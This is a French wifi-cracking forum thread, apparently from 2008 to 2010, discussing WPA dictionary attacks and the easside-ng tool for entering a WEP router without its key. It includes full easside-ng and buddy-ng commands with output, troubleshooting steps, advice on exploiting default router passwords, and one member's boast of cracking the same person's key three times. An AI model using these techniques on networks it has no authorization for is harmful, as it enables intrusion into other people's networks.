Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-05-2008 12:10:17

noob
Membre Indétronable
Inscription : 12-05-2008
Messages : 178

Une autre faille

Bonjour,

Existe-il une autre faille que l'attaque par dico à l'aide du handshake ?

Merci de me répondre.

P.S : j'ai entendu parlé de easide-ng oû quelques chose que ça qui pourrait trouver les WPA-PSK[TKIP]

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-05-2008 13:41:54

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Une autre faille

L'attaque du handshake par bruteforce à coup de fichiers dictionnaires est à ce jour la seule faille publique connue permettant de cracker une clé WPA.

Concernant Easside-ng, il s'agit d'une attaque permettant de communiquer avec un routeur en WEP, et réussir à rentrer dans le routeur sans meme en avoir la clé. Le principe est assez complexe et très ingénieux. Regarde La documentation officielle de easside-ng. Une fois dans le routeur, tu vas dans l'interface d'administration (il faut connaitre les logins et password) et tu peux directement voir la clé, et meme la modifier. Cette attaque est assez difficile à mettre en oeuvre, et dans le cas du WEP les attaques du type rejeu d'arp avec aireplay-ng plus crack avec aircrack-ng sont bien plus efficaces.
Cependant, le principe meme de easside-ng ouvre la voie à de nouveaux types d'attaques, ce qui nous permet d'ésperer un jour la découverte d'une nouvelle faille pour le WPA.

Hors Ligne

#3 12-05-2008 19:23:03

noob
Membre Indétronable
Inscription : 12-05-2008
Messages : 178

Re : Une autre faille

M1ck3y a écrit :

L'attaque du handshake par bruteforce à coup de fichiers dictionnaires est à ce jour la seule faille publique connue permettant de cracker une clé WPA.

Concernant Easside-ng, il s'agit d'une attaque permettant de communiquer avec un routeur en WEP, et réussir à rentrer dans le routeur sans meme en avoir la clé. Le principe est assez complexe et très ingénieux. Regarde La documentation officielle de easside-ng. Une fois dans le routeur, tu vas dans l'interface d'administration (il faut connaitre les logins et password) et tu peux directement voir la clé, et meme la modifier. Cette attaque est assez difficile à mettre en oeuvre, et dans le cas du WEP les attaques du type rejeu d'arp avec aireplay-ng plus crack avec aircrack-ng sont bien plus efficaces.
Cependant, le principe meme de easside-ng ouvre la voie à de nouveaux types d'attaques, ce qui nous permet d'ésperer un jour la découverte d'une nouvelle faille pour le WPA.

A l'aide d'un pc connecté sur internet avec un port ouvert et un serveur buggy ?

De toutes façons , cette attaque ne sert a rien puisque on sera bloqué devant le mot de passe d'adminatrateur ( par défault : admin  ...) Personne ne laisse le mot de passe par défault smile

Comment est-ce possible de rentrer sur le réseau LAN et avoir acess a l'interface Http du routeur sans la clé , il y a quelque chose qui m'échappe ..

Hors Ligne

#4 12-05-2008 19:39:44

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Une autre faille

noob a écrit :

Personne ne laisse le mot de passe par défault smile

Tu crois vraiment ça? lol Il y a des gens qui ne savent meme pas comment accéder à l'interface d'administration de leur box, tu sais, alors pour ce qui est de modifier le mot de passe...

noob a écrit :

Comment est-ce possible de rentrer sur le réseau LAN et avoir acess a l'interface Http du routeur sans la clé , il y a quelque chose qui m'échappe ..

Alors lis la documentation, et relis la plusieurs fois. J'ai du la lire au moins 3 fois avant de commencer à comprendre comment ça fonctionne. C'est réellement un truc de fou, absolument génial! (ça ne fonctionne que si le PC attaquant est connecté au net)

Hors Ligne

#5 12-05-2008 19:55:33

noob
Membre Indétronable
Inscription : 12-05-2008
Messages : 178

Re : Une autre faille

M1ck3y a écrit :
noob a écrit :

Personne ne laisse le mot de passe par défault smile

Tu crois vraiment ça? lol Il y a des gens qui ne savent meme pas comment accéder à l'interface d'administration de leur box, tu sais, alors pour ce qui est de modifier le mot de passe...

noob a écrit :

Comment est-ce possible de rentrer sur le réseau LAN et avoir acess a l'interface Http du routeur sans la clé , il y a quelque chose qui m'échappe ..

Alors lis la documentation, et relis la plusieurs fois. J'ai du la lire au moins 3 fois avant de commencer à comprendre comment ça fonctionne. C'est réellement un truc de fou, absolument génial! (ça ne fonctionne que si le PC attaquant est connecté au net)

Juste comme ça tu as l'air de bien métriser l'english mais malheuresement ce n'est pas le cas de tout le monde (je comprend peu être 15% hmm ) wink

Il faut quand même être plus que "noob" pour ne pas savoir changer un mot de passe par défault de sa box smile mais après tout tu as raison il y en aura forcement qui ne savent pas le faire ou un simple oublie  mais cela doit être quand même assez rare ..

Euh , donc cette attaque se sera pas possible sur toutes les freebox puisque il n'y a pas de serveur http:192.168.x.x en lan .. je veux dire il n'y a pas d'interface du modem acessible par le réseau lan , il faut apparement s'identifier et passer sur le site de free et faire les changements du site y compris la clé smile et ces identifiants sont les mêmes que les utilisateurs free donc ce n'est pas admin/admin wink Ils recoivent les identifiants sans leurs boites à lettres wink

bref , toutes les autres box , modem ou routeur c'est bon smile

Dernière modification par noob (12-05-2008 19:59:10)

Hors Ligne

#6 12-05-2008 20:08:38

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Une autre faille

Oui, le principe meme de l'attaque est de s'introduire dans l'interface d'administration du routeur, donc comme tu l'as compris sur les freebox c'est grillé, ainsi que sur tous les routeurs dont le propriétaire a pris soin de ne pas laisser le mot de passe d'origine.

Et ce n'est pas forcément "bon" sur toutes les box non plus. En fait cette attaque est assez difficile à réaliser. Si la box a un firewall, ça risque de poser problème.

J'avais testé sans succès à l'époque, voici ce que j'avais posté sur tuto-fr:

J'ai commencé à tester Easside-ng (Wesside n'est pas très stable apparemment, et le crack automatique ne m'intéresse pas des masses). Là je bloque à la première étape:
bt~#buddy-ng
waiting for connection
Comment connecter le buddy server? D'ailleurs il va se connecter ou celui là? C'est le routeur qui me bloque le port 6969? Ou bien c'est parce que je n'ai pas sqlite 4.0?
Bon, j'aimerais bien réussir à faire tourner easside, parce que sur le principe c'est un truc de dingue, se connecter au routeur sans avoir la clé wep, je veux le voir de mes propres yeux...
Apparemment avant tout il faut lancer modprobe tun, puis buddy-ng. Easside-ng me dit "can't parse my ip" pendant que le buddy server "waiting for connection"
Un ptit coup de main pour comprendre comment ça fonctionne?

Tu as réussi à avoir les sources car elles ont été retirées du site officie???!!!
Je vais essayer de m'y mettre la semaine prochaine!
Bon courage

En fait jusqu'ici j'utilisais Aircrack_ng_1_0_dev_svn_613.lzm, mais la dev_svn_653 est sortie, et je viens de le voir à l'intant la dev_svn_671 est dispo depuis 2 jours.
Je vais de ce pas la télécharger ici:
http://www.slax.org/modules.php?categor … ircrack-ng
Ensuite un petit mo2lzm, je me refais une iso propre avec sqlite 4.0 et quelques modules sympas, et puis je reprend les tests. J'ai lu quelques news sur Wesside-ng, apparemment les "error max retransmit" sont monnaie courante, ça ne veut pas dire que le programme bug, parfois il faut une heure d'essais avant que ça crack quelque chose. Donc autant le faire en manuel, au moins on sait exactement ce qui se passe, c'est plus rapide et plus intéressant. Je ne vois pas grand intéret à ce wesside, sauf peut etre pour les noob qui se contenteront de lancer weside-ng enter, wesside-ng enter jusqu'à ce que ça donne un résultat... Par contre je veux vraiment faire tourner easside! Je vais préparer mes modules, et c'est parti... wink

Voila, j'ai mis en place la config pour les tests sur l'autre ordi, c'est en train de tourner. Apparemment ça va un peu mieux avec sqlite, je n'ai plus le message "can't parse my ip".
En revanche j'ai celui ci:
bt TEST_Easside #easside-ng -f wlan0 -v 00:16:41:xx:xx:xx -m xx:xx:xx:xx:xx:xx -c 10 -s 192.168.1.11
Setting tap MTU
Sorting out wifi MAC
easside-ng: wi_set mac(): Bad address

j'ai essayé avec l'ip de la carte wifi connectée au net sur cet exemple, j'ai aussi essayé avec l'ip internet externe de la box, avec l'ip de la box, ça donne le meme résultat.
J'ai utilisé comme paramètres:
-f wlan0 (en monitor, airodump tourne en prallele pour que je puisse voir ce qui se passe, j'utilise une autre carte wifi pour me connecter au net, la connection est ok sur rausb0)
-v: la mac de la box sur laquelle je suis connecté en ce moment meme sous win
-m:la mac de l'ordi sous win (avec lequel j'écris sur le forum wink )
Bon, ça avance tranquillement...

Oulala, ça commence à sentir très bon...
Je viens de capter une petite subtilité, apparemment easside ne fonctionne pas avec la mac d'une station déja connectée au routeur (conflit de mac probablement). J'ai supprimé l'option -m, mis un ptit coup de macchanger sur wlan0 en lui attribuant une autre mac (qui figure dans la liste du filtre mac du routeur bien sur) et j'ai obtenu ce joli résultat:

bt TEST_Easside # easside-ng -f wlan0 -v 00:16:41:xx:xx:xx -c 10 -s 192.168.1.11
Setting tap MTU
Sorting out wifi MAC
MAC is xx:xx:xx:xx:xx:xx
Setting tap MAC
[16:55:03.916926] Ownin...
Assuming IP 48
[16:55:03.917550] Got 12 bytes of PRGA IV [BE:15:94]

SSID Livebox-xxxx Chan 10 Mac 00:16:41:xx:xx:xx
Sending auth request
Authenticated
Sending assoc request
Associated: 2
[16:55:04.401367] Got 28 bytes of PRGA IV [C6:15:94]
[16:55:04.709035] Got 76 bytes of PRGA IV [C9:15:94]
[16:55:05.017295] Got 220 bytes of PRGA IV [D0:15:94]
[16:55:05.328034] Got 652 bytes of PRGA IV [D8:15:94]
[16:55:05.642050] Got 1504 bytes of PRGA IV [DE:15:94]
[16:55:10.229366] Guessing prga byte 13 with 7D
Got IP ID
[16:55:16.373731] Guessing prga byte 16 with 98
Got IP TTL
[16:55:18.829873] Guessing prga byte 17 with C9
Got proto tcp
[16:55:22.517139] Guessing prga byte 19 with 65
Got checksum [could use to help bforce addr]
[16:55:24.669262] Guessing prga byte 20 with B0
Source IP so far: 192
[16:55:26.206266] Guessing prga byte 21 with 7C
Source IP so far: 192.168
[16:55:29.278511] Guessing prga byte 22 with FC
Source IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Sending who has 192.168.1.1 tell 192.168.1.123
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC xx:xx:xx:xx:xx:xx                                    =>celle là je sais pas d'ou elle sort?
Trying to connect to buddy: 192.168.1.11:6969
Connected
Handshake compl33t
Checking for internet... 1
Checking for internet... 2
Checking for internet... 3
Checking for internet... 4
Checking for internet... 5
Checking for internet... 6
Checking for internet... 7
Checking for internet... 8
Checking for internet... 9
Checking for internet... 10
Checking for internet... 11
Checking for internet... 12
Checking for internet... 13
Checking for internet... 14
Checking for internet... 15
Checking for internet... 16
Checking for internet... 17
Checking for internet... 18
Checking for internet... 19
Checking for internet... 20
Checking for internet... 21
Checking for internet... 22
Checking for internet... 23
Checking for internet... 24
Checking for internet... 25
Dying: signal
bt TEST_Easside # 

Parallèlement, notre ami le buddy a donné cela:

bt TEST_Easside # buddy-ng
Waiting for connexion
Got connection from 192.168.1.11
Handshake complete
That was it
Waiting for connexion

Je m'approche, là je suspecte un problème lié à ma box de m**** qui a sérieusment tendance à refuser les connections entrantes, il doit y avoir un paramètre de nat à configurer pour rediriger le port 6969 du buddy-server, ça doit etre un truc dans le genre. En tout cas c'est déja bien mieux que "can't parse my ip" ou "wi_set mac(): Bad address" big_smile
Au boulot les gars c'est presque bon là allez allez allez... wink

(à noter: l'ip à renseigner dans le paramètre -s semble bien etre celle de la carte réseau qui dispose de la connection internet d'après le résultat de ce test)


Voila, suite à ces quelques tests j'avais un peu discuté sur irc avec un gars de la team aircrack-ng, Darkaudax, qui m'avais dit que j'avais probablement un problème de port forwarding, mais pourtant j'avais redirigé les ports comme il faut, j'avoue ne pas comprendre. Je n'ai pas repris cet intéressant test, et personne non plus d'ailleurs... Si tu te sens de tester ça, ça pourrait donner un tuto intéressant si tu y arrive wink

Hors Ligne

#7 12-08-2008 20:57:20

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Une autre faille

Hello.

Juste pour dire que j'ai essayé mais que je suis bloqué à l'étape au "Sending who has ........" , ca flood tout l'écran et rien ne se produit...

Hors Ligne

#8 12-08-2008 22:12:53

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Une autre faille

Pense à bien forwarder le port 6969 vers ton buddy server wink

Mais si tu bloque à cette étape, c'est peut etre à cause du firewall de la box victime qui peut lui aussi poser problème, lors de mes tests j'avais forwardé les ports sur les 2 box, il me semble meme que j'avais désactivé les firewalls des box aussi...

Easside-ng, c'est la galère à faire tourner, je te dis bon courage!

Hors Ligne

#9 12-08-2008 22:29:38

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Une autre faille

Le buddy server est opérationnel, j'en sûr à 100%.
(pour vérifier cela, on peut faire un usage détourné du testeur de port µtorrent : on fais tourner le buddy server, et on se rend sur http://www.utorrent.com/testport.php?port=6969, test ok pour moi wink )

Ce que je n'aime pas sur cette attaque, c'est le besoin d'avoir un server auxiliaire. (et donc une connexion internet)

En fait, faut voir ce tool comme un gadget hautement complexe qui permet de relancer un pavé dans l'eau déjà trouble du wep, comme quand par exemple lorsque Magic Johnson marque un panier, faut qu'il le fasse d'une manière tordu plutôt que de le faire simplement ; d'ailleurs en regardant sur aircrack-ng.org la documentation à propos de l'utilitaire, leurs arguments sur pourquoi utiliser cela alors qu'aircrack-ptw existe sont futiles.

Dernière modification par alan-smithee (14-08-2008 13:03:47)

Hors Ligne

#10 16-08-2008 15:59:54

noob
Membre Indétronable
Inscription : 12-05-2008
Messages : 178

Re : Une autre faille

Si ça peut vous aidez j'ai un site sympa, c'est http://www.canyouseeme.org/ pour vérifier les ports ouverts...

Je vais essayer de me remettre sur easside-ng dans quelques jours..

Hors Ligne

#11 20-08-2008 23:09:08

Copy
Membre
Inscription : 18-08-2008
Messages : 10

Re : Une autre faille

Heu je croit qu(il y a un probleme M1ck3y avec ta commande .

a un moment tu as  : Trying to connect to buddy: 192.168.1.11:6969

je pense que l'erreur vient de la. bt TEST_Easside #easside-ng -f wlan0 -v 00:16:41:xx:xx:xx -m xx:xx:xx:xx:xx:xx -c 10 -s 192.168.1.11

le probleme c'est que easide ng envoie une requete a 192.168.1.11 hors le but de easside et de passer par internet pour les requetes de retour. Donc si tu lui dit d'envoyer a 192.168.1.11 la livebox va renvoyer ces packet sur son reseau local.

donc pou moi en -s tu doit metre ton ip wan a toi. donc par exemple tu met internet sur ton ethernet et tu dit a buddy d'ecouter sur l'interface ethernet sur le port 6969 , bien sur si t'es derriere une box n'oublie de forwader ce port sur ton pc ou ya buddy.

j'espere que ta compris tout mon charabiat ?

Hors Ligne

#12 21-08-2008 18:13:04

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Une autre faille

Oui, je pense avoir compris, c'est très clair. En effet, le problème devait surement venir de là, un grand merci à toi Copy pour ces explications smile

Hors Ligne

#13 21-08-2008 22:41:56

Copy
Membre
Inscription : 18-08-2008
Messages : 10

Re : Une autre faille

tient nous au courant, si tu reesaye !!

ça peu etre sympa d'y arriver.

Hors Ligne

#14 20-05-2010 19:20:24

evildeux
Banni(e)
Inscription : 25-04-2010
Messages : 17
Site Web

Re : Une autre faille

Bonjour à tous

Trouvé la faille à tout casser une clé c'est avoir ce dur dur de trouver la clé j'ai déjà essayé mais aussi des ja du acheter dictionnaire mais ce n'est pas donné ça coûte 5 € voir pour moi. J'ai cassé trois fois la clé de la même personne. Trois années vous allez me dire s'est pas beaucoup n'est pas mal comme c'est ce que j'ai commencé alors avec eepc 901 valeur facile de craquer une super machine comme départ des couettes comme dit certain c'est la résolution qui dure trop petite déjà rêver comme l'affaire scot dite. Passé bonne soirée et à plus


Windows 7 64 Bit PC
Ubuntu - Lucid Lynx 10.04 Duel Boot Blacktrack 4 Final PC portable

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]